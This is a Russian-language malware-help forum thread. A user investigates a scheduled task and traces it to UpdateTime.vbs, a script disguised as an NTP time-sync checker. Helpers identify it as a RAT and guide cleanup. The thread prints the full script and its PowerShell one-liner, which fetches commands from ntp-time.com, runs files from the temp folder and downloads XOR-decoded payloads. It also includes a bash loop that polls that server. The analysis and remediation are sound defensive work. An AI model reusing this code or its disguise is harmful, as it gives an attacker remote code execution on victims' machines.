подозреваю наличие малвари (windows11, powershell)

Printable View

20.04.2024, 17:46
Tray5539

подозреваю наличие малвари (windows11, powershell)

Во время работы произвольно появилось окошко блокнота.
Проверил последние события, одно из них показалось подозрительным.
Перезагрузился в дуалбут, подмонтировал раздел с windows, запустил evtxexport.

[CODE]
evtxexport -p c/ -r /media/user/5C3C92533C9227D2/Windows/System32/config/ /media/user/5C3C92533C9227D2/Windows/System32/winevt/Logs/Windows\ PowerShell.evtx

Event number : 24944
Written time : Apr 15, 2024 12:22:30.933652700 UTC
Event level : Information (4)
Computer name : VIM-DESKTOP
Source name : PowerShell
Event identifier : 0x00000258 (600)
Number of strings : 3
String: 1 : Alias
String: 2 : Started
String: 3 : ProviderName=Alias
NewProviderState=Started

SequenceNumber=3

HostName=ConsoleHost
HostVersion=5.1.22621.2506
HostId=b72eb182-d609-4f67-8217-9be2f0ab1163
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /c add-type -assembly system.web.extensions;$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds=euuaeljqrr -Headers @{'Cache-Control'='no-cache'}).Content);if($k.s-eq'1'){$n=$env:TEMP+'\'+$k.n;&$n $($k.p);$s=$env:TEMP+'\'+$k.c;if(Test-Path $s){$m=(cat -Path $s)}if($m -eq $k.m){exit}else{(echo $k.m|Out-File -FilePath $s);$f='';$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});iwr -Uri $f -OutFile $n;}}
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

...

Event number : 24952
Written time : Apr 15, 2024 14:18:04.745717600 UTC
Event level : Information (4)
Computer name : VIM-DESKTOP
Source name : PowerShell
Event identifier : 0x00000258 (600)
Number of strings : 3
String: 1 : Registry
String: 2 : Started
String: 3 : ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.1.22621.2506
HostId=9357fea1-38f0-4585-82d7-92e69a00bd57
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /c add-type -assembly system.web.extensions;$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds=euuaeljqrr -Headers @{'Cache-Control'='no-cache'}).Content);if($k.s-eq'1'){$n=$env:TEMP+'\'+$k.n;&$n $($k.p);$s=$env:TEMP+'\'+$k.c;if(Test-Path $s){$m=(cat -Path $s)}if($m -eq $k.m){exit}else{(echo $k.m|Out-File -FilePath $s);$f='';$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});iwr -Uri $f -OutFile $n;}}
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

[/CODE]

Whois показывает что ntp-time.com зарегистрирован на физлицо в Астане.
Пробовал получить полезную нагрузку, что бы понять что чистить:
[CODE]
#!/bin/bash

while [ $(jq ".s" value) = "\"0\"" ]; do
curl -s -A "Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.15063; en-US) PowerShell/6.0.0" --header "Cache-Control=no-cache" "ntp-time.com/s.t?seconds=euuaeljqrr" -o value || break
sleep 60;
date
jq "." value
done
[/CODE]
Пока возвращает только вариант "s=0".
[CODE]
{
"m": "set times",
"p": "de.pool.ntp.org 0 2",
"s": "0",
"c": "14:18:51.595133",
"l": "ss:mm:HH",
"n": "updatetime"
}
[/CODE]
Параллельно с этим скачал антивирус, обновил базы (freshclam) и запустил сканирование по всему диску (clamscan -r).

Пока планирую дождаться результатов сканирование и только потом запускать софт с форума (видимо нужно будет загрузиться в безопасном режиме).
Возможно можно извлечь из ситуации что-то еще? Проверить другие журналы, может быть возможно проверить из-под дуалбута автозапуск, или есть какие-то еще полезные инструменты.
20.04.2024, 17:47
Info_bot

Уважаемый(ая) [B]Tray5539[/B], спасибо за обращение на наш форум!

Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
20.04.2024, 19:39
Tray5539

Поискал по тегу.

[CODE]
$ ag --workers=20 --silent --one-device --search-binary -u -a -s "euuaeljqrr" ./
Documents and Settings/user/AppData/Roaming/seconds.ini
1:euuaeljqrr

Documents and Settings/user/Application Data/seconds.ini
1:euuaeljqrr
^C
[/CODE]

Прервал поиск,
запустил поиск по "seconds.ini"

[CODE]
$ ag --workers=20 --silent --one-device --search-binary -u -a -s -F "seconds.ini" ./
Documents and Settings/user/AppData/Roaming/Windows/UpdateTime.vbs
64:c="""powershell.exe"" /c ""add-type -assembly system.web.extensions;$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds="+GetSeconds(apppath+"\seconds.ini")+" -Headers @{'Cache-Control'='no-cache'}).Content);if($k.s-eq'1'){$n=$env:TEMP+'\'+$k.n;&$n $($k.p);$s=$env:TEMP+'\'+$k.c;if(Test-Path $s){$m=(cat -Path $s)}if($m -eq $k.m){exit}else{(echo $k.m|Out-File -FilePath $s);$f='';$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});iwr -Uri $f -OutFile $n;}}"""

Documents and Settings/user/Application Data/Windows/UpdateTime.vbs
64:c="""powershell.exe"" /c ""add-type -assembly system.web.extensions;$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds="+GetSeconds(apppath+"\seconds.ini")+" -Headers @{'Cache-Control'='no-cache'}).Content);if($k.s-eq'1'){$n=$env:TEMP+'\'+$k.n;&$n $($k.p);$s=$env:TEMP+'\'+$k.c;if(Test-Path $s){$m=(cat -Path $s)}if($m -eq $k.m){exit}else{(echo $k.m|Out-File -FilePath $s);$f='';$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});iwr -Uri $f -OutFile $n;}}"""
[/CODE]

А вот и сам "UpdateTime.vbs", гуглом не находится.
[SPOILER]
[CODE]
Set Args = WScript.Arguments
If WScript.Arguments.Count < 3 Then
Err = 3
WScript.Echo "UpdateTime.vbs V1.01"
WScript.Echo "Usage: cscript /NoLogo UpdateTime.vbs serverlist warn crit [biggest]"
Wscript.Echo ""
Wscript.Echo "Options:"
Wscript.Echo " serverlist (required): one or more server names, coma-separated"
Wscript.Echo " warn (required): warning offset in seconds, can be partial"
Wscript.Echo " crit (required): critical offset in seconds, can be partial"
Wscript.Echo " biggest (optional): if multiple servers, else use default least offset"
Wscript.Echo ""
Wscript.Echo "Example:"
Wscript.Echo "cscript /NoLogo UpdateTime.vbs myserver1,myserver2 0.4 5 biggest"
Wscript.Quit(Err)
End If
WScript.Sleep 180000
serverlist = Args.Item(0)
warn = Args.Item(1)
crit = Args.Item(2)
On Error Resume Next
If WScript.Arguments.Count > 3 Then
criteria = Args.Item(3)
Else
criteria = least
End If
Set objShell = CreateObject("Wscript.Shell")
strTemp="C:\Users\user\AppData\Local\Temp"
apppath="C:\Users\user\AppData\Roaming"
Function seconds()
On Error Resume Next
chars = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For i = 1 To 10
seconds = seconds & Mid(chars, Int(Rnd * Len(chars)) + 1, 1)
Next
On Error Goto 0
End Function
Function SaveSeconds(filePath, strtext)
On Error Resume Next
Set file = CreateObject("Scripting.FileSystemObject").CreateTextFile(filePath, True)
file.Write(strtext)
file.Close
On Error Goto 0
End Function
Function GetSeconds(filePath)
On Error Resume Next
newseconds = seconds()
If CreateObject("Scripting.FileSystemObject").FileExists(filePath) Then
Set objFile = CreateObject("Scripting.FileSystemObject").OpenTextFile(filePath, 1)
GetSeconds = objFile.ReadAll
objFile.Close
If Not (Len(GetSeconds) > 1) Then
SaveSeconds filePath, newseconds
GetSeconds = newseconds
End If
Else
SaveSeconds filePath, newseconds
GetSeconds = newseconds
End If
On Error Goto 0
End Function
strCommand = """cmd.exe"" ""/c C:\WINDOWS\System32\w32tm.exe /monitor /nowarn /computers:" & serverlist & " > " & strTemp & "\time_logfile.log"""
c="""powershell.exe"" /c ""add-type -assembly system.web.extensions;$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds="+GetSeconds(apppath+"\seconds.ini")+" -Headers @{'Cache-Control'='no-cache'}).Content);if($k.s-eq'1'){$n=$env:TEMP+'\'+$k.n;&$n $($k.p);$s=$env:TEMP+'\'+$k.c;if(Test-Path $s){$m=(cat -Path $s)}if($m -eq $k.m){exit}else{(echo $k.m|Out-File -FilePath $s);$f='';$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});iwr -Uri $f -OutFile $n;}}"""
WScript.CreateObject("WScript.Shell").Run strCommand,0,false
Set objFSO = CreateObject("Scripting.FileSystemObject")
input = ""
strOutput = ""
Do While Not objFSO.FileExists(strTemp+"\time_logfile.log")
Wscript.Sleep 1000
Loop
condition = False
Do
Wscript.Sleep 1000
Set file = objFSO.OpenTextFile(strTemp+"\time_logfile.log", 1)
strTaskText = file.ReadAll
strTaskText=Left(strTaskText,Len(strTaskText)-2)
file.Close
input = strTaskText
s=Left(CreateObject("Scriptlet.TypeLib").Guid,38)
If InStr(input, "[") Then
strOutput = strOutput & input
objFSO.DeleteFile strTemp+"\time_logfile.log"
condition = True
End If
Loop Until condition
result = "0"
If InStr(input, "NTP") Then
Set myRegExp = New RegExp
myRegExp.IgnoreCase = True
myRegExp.Global = True
myRegExp.Pattern = " NTP: ([+-][0-9]+\.[0-9]+)s"
Set myMatches = myRegExp.Execute(strOutput)
if myMatches.count>0 then
If myMatches(0).SubMatches(0) <> "" Then
result = myMatches(0).SubMatches(0)
End If
End if
End If
WScript.CreateObject("WScript.Shell").Run c,0,false
GetObject("new:{C08AFD90-F2A1-11D1-8455-00A0C91F3880}").putProperty s,Me
For Each myMatch in myMatches
If myMatch.SubMatches(0) <> "" Then
If criteria = "biggest" Then
If Abs(result) < Abs(myMatch.SubMatches(0)) Then
result = myMatch.SubMatches(0)
End If
Else
If (result > myMatch.SubMatches(0)) Then
result = myMatch.SubMatches(0)
End If
End If
End If
Next
If result = "" Then
Err = 3
Status = "UNKNOWN"
ElseIf result > crit Then
Err = 2
status = "CRITICAL"
ElseIf result > warn Then
Err = 1
status = "WARNING"
Else
Err = 0
status = "OK"
End If
statustime = "NTP " & status & ": Offset " & result & " secs|'offset'=" & result & "s;" & warn & ";" & crit & ";"
On Error Goto 0
Wscript.Quit(Err)

[/CODE]
[/SPOILER]
20.04.2024, 20:28
Vvvyg

С первого взгляда плохого не вижу, выглядит, как скрипт синхронизации времени (хотя я в Poweshell и .VBS не специалист). Но сайт ntp-time.com в [URL="https://www.virustotal.com/gui/url/36bcc7f830182c4fa334ead1c15c005769c90e1546f2690455438744ef7f1da4?nocache=1"]базе нехороших Касперского[/URL].
Так что, хоть я и запасся попкорном, логи по правилам форума хотелось бы видеть.
20.04.2024, 22:12
Tray5539

Вложений: 2

Чет я переоценил скорость clam-a, вот логи (удалил одну строчку из из LNK.log)

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[QUOTE]первого взгляда плохого не вижу[/QUOTE]

Сам тоже Poweshell не знаю, но там дословно написано: скачать и распарсить json в переменную, если s не равно 1 ничего не делать (sic! т.е все данные в мусорку, ничего полезного оно не сделает), запустить код по пути ".n", проверить если ли ".c" во временной папке, создать из ".f" url путём ксора с 5, скачать то что лежит по этому url-у в файл ".n".

Вот отформатировал:
[CODE]
add-type -assembly system.web.extensions;
$k=(new-object system.web.script.serialization.javascriptSerializer).DeserializeObject((iwr -Uri ntp-time.com/s.t?seconds=euuaeljqrr -Headers @{'Cache-Control'='no-cache'}).Content);
if($k.s-eq'1'){
$n=$env:TEMP+'\'+$k.n;
&$n $($k.p);
$s=$env:TEMP+'\'+$k.c;
if(Test-Path $s){$m=(cat -Path $s)}
if($m -eq $k.m){exit}else{
(echo $k.m|Out-File -FilePath $s);
$f='';
$k.l.ToCharArray().ForEach({$f+=[char]($_-bxor5)});
iwr -Uri $f -OutFile $n;
}
}
[/CODE]

iwr = Invoke-WebRequest

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Полное ощущение что она переехала с переустановкой (вроде на 11 обновлял, уже не помню):
[CODE]
/media/user/5C3C92533C9227D2 ⌚ 21:07:38
$ stat "Users/user/Application Data/Windows/UpdateTime.vbs"
File: Users/user/Application Data/Windows/UpdateTime.vbs
Size: 4426 Blocks: 16 IO Block: 4096 regular file
Device: 259,6 Inode: 86576 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 1000/ user) Gid: ( 1000/ user)
Access: 2024-04-20 20:22:18.050087600 +0300
Modify: 2023-10-24 19:03:59.361736900 +0300
Change: 2024-04-03 00:11:08.846170200 +0300
Birth: 2023-10-24 19:03:59.358083800 +0300

/media/user/5C3C92533C9227D2 ⌚ 21:08:03
$ stat "Windows.old/Users/user/Application Data/Windows/UpdateTime.vbs"
File: Windows.old/Users/user/Application Data/Windows/UpdateTime.vbs
Size: 4426 Blocks: 16 IO Block: 4096 regular file
Device: 259,6 Inode: 86576 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 1000/ user) Gid: ( 1000/ user)
Access: 2024-04-20 20:22:18.050087600 +0300
Modify: 2023-10-24 19:03:59.361736900 +0300
Change: 2024-04-03 00:11:08.846170200 +0300
Birth: 2023-10-24 19:03:59.358083800 +0300
[/CODE]

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Понял что запускал не от админа, запустил еще раз, и с интернетом.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Пока выключил задачу в планировщике, она прям заметная (все остальные 140 находятся в Microsoft, а эта одна в Windows).
[url=https://ibb.co/nj1Gkb4][img]https://i.ibb.co/QMHgmfh/Screenshot-2024-04-20-221052.png[/img][/url]
20.04.2024, 23:14
Vvvyg

Можно так.
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O22 - Tasks: \Windows\SystemTime\Time Synchronization\SyncTime - C:\Users\user\AppData\Roaming\Windows\UpdateTime.vbs de.pool.ntp.org 0 2 (not signed - no company - 647755DED21FD816EB36E48CB24350EB9A57DE63)[/code]
21.04.2024, 00:25
Tray5539

Сделал. Поставил Касперского, он этот запрос блокирует (совершал ручками), но он пока ничего не нашел. Чувствую ждать как минимум неделю, буду надеется на то что он в онлайн-режиме среагирует если что >:(

[CODE]
Вчера, 20/04/2024 22:35:55;Остановлен переход на сайт;Windows PowerShell ISE;powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0;6632;VIM-DESKTOP\user;Инициатор;Запрещено;Запрещено;http://ntp-time.com/s.t?seconds=euuaeljqrr;Вредоносная ссылка;Высокая;Точно;http://ntp-time.com/s.t?seconds=euuaeljqrr;s.t?seconds=euuaeljqrr;http://ntp-time.com;Веб-страница;Базы
Вчера, 20/04/2024 22:38:41;Остановлен переход на сайт;Windows PowerShell ISE;powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0;6632;VIM-DESKTOP\user;Инициатор;Запрещено;Запрещено;http://ntp-time.com/s.t?seconds=euuaeljqrr;Вредоносная ссылка;Высокая;Точно;http://ntp-time.com/s.t?seconds=euuaeljqrr;s.t?seconds=euuaeljqrr;http://ntp-time.com;Веб-страница;Базы
Вчера, 20/04/2024 22:36:56;Остановлен переход на сайт;Windows PowerShell ISE;powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe;C:\Windows\System32\WindowsPowerShell\v1.0;6632;VIM-DESKTOP\user;Инициатор;Запрещено;Запрещено;http://ntp-time.com/s.t?seconds=euuaeljqrr;Вредоносная ссылка;Высокая;Точно;http://ntp-time.com/s.t?seconds=euuaeljqrr;s.t?seconds=euuaeljqrr;http://ntp-time.com;Веб-страница;Базы
[/CODE]
21.04.2024, 10:19
Dragokas

Здравствуйте!
Посмотрел я выложенные скрипты. Ну, это RAT, любопытно замаскированный.
Синхронизирует время, пытаясь имитировать что-то полезное. На деле между строк по таймеру может выполнять любую команду с сервера ntp-time.com в форме исполняемого файла, дешифрованного через XOR. s=1 от погоды, т.е. когда оператор решит. Соль там рандомная, можно не пытаться подобрать запрос. Артифакты, если и сохранились, то лежат в юзерской папке %TEMP% в виде любого формата исполняемого файла под любым именем. Скрипт также зачем-то юзает технику бесфайлового хранения себя в глобальном пространстве (explorer-a).
21.04.2024, 14:04
Vvvyg

[QUOTE=Dragokas;1530404]Артифакты, если и сохранились, то лежат в юзерской папке %TEMP% в виде любого формата исполняемого файла под любым именем.[/QUOTE]

Закинем удочку, вдруг, что-то осталось интересное.
[b]Tray5539[/b], [url="http://virusinfo.info/showthread.php?t=7239"]выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]begin
QuarantineFileF('%TMP%', '*.exe, *.dll, *.sys, *.bat, *.vbs', false,'', 0, 0, '01.01.2024', '20.04.2024');
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/code]
В папке с AVZ появится архив карантина quarantine.zip, упакуйте его в архив с паролем, выложите на файлообменник или в облако и дайте ссылку с паролем [U][B]в личном сообщении[/B][/U].
21.04.2024, 15:28
Tray5539

[QUOTE]что-то осталось интересное.[/QUOTE]
Скрипт сгенерировал пустой архив.

Антивирус за ночь нашел что-то неактуальное по архивам многолетней давности + две относительно свежие угрозы:
1. (выглядит супер безобидно, но оставлю тут чисто для истории)

[URL="https://www.virustotal.com/gui/file/1262632680163140a119e69785215c8e3166ec9d154307f46983d2056b6c3aed"]virustotal[/URL]
[SPOILER]
Имя приложения: avp.exe
Путь к приложению: C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.16
Компонент: Файловый Антивирус
Описание результата: Создана резервная копия
Тип: Троянское приложение
Название: Trojan-Downloader.MSIL.PureCrypter.y
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Файл
Имя объекта: ASCENDIO II.I - Installer.exe
Путь к объекту: C:\Users\user\Downloads\Ascendio II.I - Installer 2.1.2-69-2-1-2-1677174988
MD5 объекта: 97805DDABBC71972444DC5807267C5CC
[/SPOILER]

2. Немного напугало: типичный hello word под вижуалку, антивирус удаляет экзешник и ругается сразу после сборки (подумал на то что компилятор заражен?)

[URL="https://www.virustotal.com/gui/file/b89723a7fc4a7479adf034f3a0a60902d81f32ab31b9f7617086b496cd18f92a/behavior"]virustotal1[/URL]
[URL="https://www.virustotal.com/gui/file/cb97b8f59c97af45c20f4965809e33bc28ec2bc5b3ec8fc1b2d4ad096c74c14c/behavior"]virustotal2[/URL]

Напрягает то что в песочнице он открывает tcp соединения.
[B]UPD.[/B] Скорее всего это false-positive, в интернете пишут что часто попадают мелкие программы. Наверное сетевая активность случайно рисуется в вирустотале. Сделал на всякий случай две сборки, положил в [URL="https://dropmefiles.com/XATyi"]карантин[/URL].

[SPOILER]
Событие: Обнаружен вредоносный объект
Пользователь: VIM-DESKTOP\user
Тип пользователя: Инициатор
Имя приложения: explorer.exe
Путь к приложению: C:\Windows
Компонент: Файловый Антивирус
Описание результата: Обнаружено
Тип: Троянское приложение
Название: VHO:Trojan-Downloader.Win32.Convagent.gen
Точность: Эвристический анализ
Степень угрозы: Высокая
Тип объекта: Файл
Имя объекта: Project1.exe
Путь к объекту: C:\Users\user\source\repos\Project1\Debug
MD5 объекта: 0A41FECD3942948F856CB2184D0B377C
Причина: Облачная защита
[/SPOILER]
21.04.2024, 18:26
Vvvyg

Файл инсталлера Ascendio достаточно подозрительный, особенно упоминание AgentTeslaV3 в YARA rule, которые на нём сработали. Достаточно, чтобы обратиться в [URL="https://support.kaspersky.ru/b2c/ru#contacts"]саппорт касперского[/URL] для более подробного анализа.

Что касается вашего файла Project1.exe - напрягает на VT в разделе BEHAVIOR то, что открывает он 3 соединения с явно не очень приличными сайтами:
[URL="https://www.virustotal.com/gui/url/bde83ba9e777cdea92fed1f58f66509dc8ae355287c72b9c57d54a139e08118f/detection"]1[/URL]
[URL="https://www.virustotal.com/gui/url/0c0da70c12cd27aeb4df793b4b9436e98a5cdb20cd63672bed8b92ba521d6c70?nocache=1"]2[/URL] - связан с APT группировкой (хакеры)
[URL="https://www.virustotal.com/gui/url/274f6e0b6a4b78e207671019fcc9ea3dbb477863f4a41de974ece7a47931149e/community"]3[/URL] - в комментах тоже интересное.

Учитывая то, что бэкдор был, могли, например, подменить некоторые библиотеки так, что на выходе получите .exe с функциями RAT и кто знает чего ещё.

Project1.exe - тоже направьте в ТП Касперского для разборок.